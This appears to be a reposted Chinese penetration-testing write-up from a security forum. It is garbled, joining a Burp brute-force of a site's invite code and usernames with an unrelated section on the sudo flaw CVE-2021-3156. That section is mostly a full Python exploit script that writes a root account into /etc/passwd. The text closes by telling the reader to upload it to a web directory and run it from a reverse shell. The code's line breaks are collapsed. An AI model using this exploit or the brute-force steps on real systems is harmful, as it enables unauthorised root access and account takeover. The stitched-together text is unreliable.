文章来源:奇安信攻防社区(带头小哥)
原文地址:https://forum.butian.net/share/1096
开局又是一个登录框,扫了目录没有其他入口。难道又要祭出拿手绝招(爆破弱口令吗),思路清晰,开搞。
看到有一个立即注册和忘记密码觉得可以搞一搞。
首先打开立即注册页面
之前以为这个邀请码是随便输入的,看来是不行的,用burp爆破一下邀请码吧。
那我们用burp来导入常见中文姓名来尝试爆破。
可以看到中文账号这里是经过url编码的,如果我们直接把中文导入burp是会乱码的。像这样
我们来匹配密码不正确的,使用python把密码不正确转换成十六进制
Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。
2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。
当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。
安全研究人员于1月26日公开披露了此漏洞,并表示该漏洞已经隐藏了近十年。
影响范围
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
查看一下sudo的版本,可以看到这个版本是存在漏洞的。
#!/usr/bin/pythonimport os
import sys
import resourcefrom struct import packfrom ctypes import cdll, c_char_p, POINTER
SUDO_PATH = b'/usr/bin/sudo'PASSWD_PATH = '/etc/passwd'APPEND_CONTENT = b'aa:$5$AZaSmJBP$lsgF8hex//kd.G4XxUJGaS618ZtYoQ796UpkM/8Ucm3:0:0:gg:/root:/bin/bash\n';#STACK_ADDR_PAGE = 0x7fffffff1000 # for ASLR disabledSTACK_ADDR_PAGE = 0x7fffe5d35000libc = cdll.LoadLibrary('libc.so.6')
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
def execve(filename, cargv, cenvp):
libc.execve(filename, cargv, cenvp)
def spawn_raw(filename, cargv, cenvp):
pid = os.fork() if pid: # parent
_, exit_code = os.waitpid(pid, 0) return exit_code else: # child
execve(filename, cargv, cenvp) exit(0)
def spawn(filename, argv, envp):
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env) return spawn_raw(filename, cargv, cenvp)
resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))# expect large hole for cmnd size is correctTARGET_CMND_SIZE = 0x1b50argv = [ 'sudoedit', '-A', '-s', PASSWD_PATH, 'A'*(TARGET_CMND_SIZE-0x10-len(PASSWD_PATH)-1)+'\\', None ]
SA = STACK_ADDR_PAGE
ADDR_REFSTR = pack('<Q', SA+0x20) # ref stringADDR_PRIV_PREV = pack('<Q', SA+0x10)
ADDR_CMND_PREV = pack('<Q', SA+0x18) # cmndspecADDR_MEMBER_PREV = pack('<Q', SA+0x20)
ADDR_DEF_VAR = pack('<Q', SA+0x10)
ADDR_DEF_BINDING = pack('<Q', SA+0x30)
OFFSET = 0x30 + 0x20ADDR_USER = pack('<Q', SA+OFFSET)
ADDR_MEMBER = pack('<Q', SA+OFFSET+0x40)
ADDR_CMND = pack('<Q', SA+OFFSET+0x40+0x30)
ADDR_PRIV = pack('<Q', SA+OFFSET+0x40+0x30+0x60)# for sprayingepage = [ 'A'*0x8 + # to not ending with 0x00
# fake def->var chunk (get freed)
'\x21', '', '', '', '', '', '',
ADDR_PRIV[:6], '', # pointer to privilege
ADDR_CMND[:6], '', # pointer to cmndspec
ADDR_MEMBER[:6], '', # pointer to member
# fake def->binding (list head) (get freed)
'\x21', '', '', '', '', '', '', '', '', '', '', '', '', '', '', # members.first
'A'*0x10 + # members.last, pad
# userspec chunk (get freed)
'\x41', '', '', '', '', '', '', # chunk metadata
'', '', '', '', '', '', '', '', # entries.tqe_next
'A'*8 + # entries.tqe_prev
'', '', '', '', '', '', '', '', # users.tqh_first
ADDR_MEMBER[:6]+'', '', # users.tqh_last
'', '', '', '', '', '', '', '', # privileges.tqh_first
ADDR_PRIV[:6]+'', '', # privileges.tqh_last
'', '', '', '', '', '', '', '', # comments.stqh_first
# member chunk
'\x31', '', '', '', '', '', '', # chunk size , userspec.comments.stqh_last (can be any)
'A'*8 + # member.tqe_next (can be any), userspec.lineno (can be any)
ADDR_MEMBER_PREV[:6], '', # member.tqe_prev, userspec.file (ref string)
'A'*8 + # member.name (can be any because this object is not freed)
pack('<H', 284), '', # type, negated
'A'*0xc+ # padding
# cmndspec chunk
'\x61'*0x8 + # chunk metadata (need only prev_inuse flag)
'A'*0x8 + # entries.tqe_next
ADDR_CMND_PREV[:6], '', # entries.teq_prev
'', '', '', '', '', '', '', '', # runasuserlist
'', '', '', '', '', '', '', '', # runasgrouplist
ADDR_MEMBER[:6], '', # cmnd
'\xf9'+'\xff'*0x17+ # tag (NOPASSWD), timeout, notbefore, notafter
'', '', '', '', '', '', '', '', # role
'', '', '', '', '', '', '', '', # type
'A'*8 + # padding
# privileges chunk
'\x51'*0x8 + # chunk metadata
'A'*0x8 + # entries.tqe_next
ADDR_PRIV_PREV[:6], '', # entries.teq_prev
'A'*8 + # ldap_role
'A'*8 + # hostlist.tqh_first
ADDR_MEMBER[:6], '', # hostlist.teq_last
'A'*8 + # cmndlist.tqh_first
ADDR_CMND[:6], '', # cmndlist.teq_last]
cnt = sum(map(len, epage))
padlen = 4096 - cnt - len(epage)
epage.append('P'*(padlen-1))
env = [ 'A'*(7+0x4010 + 0x110) + # overwrite until first defaults
'\x21\\', '\\', '\\', '\\', '\\', '\\', '\\',
'A'*0x18 +
# defaults
'\x41\\', '\\', '\\', '\\', '\\', '\\', '\\', # chunk size
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', # next
'a'*8 + # prev
ADDR_DEF_VAR[:6]+'\\', '\\', # var
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', # val
ADDR_DEF_BINDING[:6]+'\\', '\\', # binding
ADDR_REFSTR[:6]+'\\', '\\', # file
'Z'*0x8 + # type, op, error, lineno
'\x31\\', '\\', '\\', '\\', '\\', '\\', '\\', # chunk size (just need valid)
'C'*0x638+ # need prev_inuse and overwrite until userspec
'B'*0x1b0+ # userspec chunk
# this chunk is not used because list is traversed with curr->prev->prev->next
'\x61\\', '\\', '\\', '\\', '\\', '\\', '\\', # chunk size
ADDR_USER[:6]+'\\', '\\', # entries.tqe_next points to fake userspec in stack
'A'*8 + # entries.tqe_prev
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '\\', # users.tqh_first
ADDR_MEMBER[:6]+'\\', '\\', # users.tqh_last
'\\', '\\', '\\', '\\', '\\', '\\', '\\', '', # privileges.tqh_first
'LC_ALL=C', 'SUDO_EDITOR=/usr/bin/tee -a', # append stdin to /etc/passwd
'TZ=:',
]
ENV_STACK_SIZE_MB = 4for i in range(ENV_STACK_SIZE_MB * 1024 / 4):
env.extend(epage)# last element. prepare space for '/usr/bin/sudo' and extra 8 bytesenv[-1] = env[-1][:-len(SUDO_PATH)-1-8]
env.append(None)
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env)# write passwd line in stdin. it will be added to /etc/passwd when success by 'tee -a'r, w = os.pipe()
os.dup2(r, 0)
w = os.fdopen(w, 'w')
w.write(APPEND_CONTENT)
w.close()
null_fd = os.open('/dev/null', os.O_RDWR)
os.dup2(null_fd, 2)for i in range(8192):
sys.stdout.write('%d\r' % i) if i % 8 == 0:
sys.stdout.flush()
exit_code = spawn_raw(SUDO_PATH, cargv, cenvp) if exit_code == 0: print('success at %d' % i) break
这个脚本使用python2运行,部分centos自带python的。
把脚本上传到网站目录,然后反弹一个交互shell,运行脚本。
巧用BP还要心细。
如有侵权,请联系删除
转自李白你好
联系客服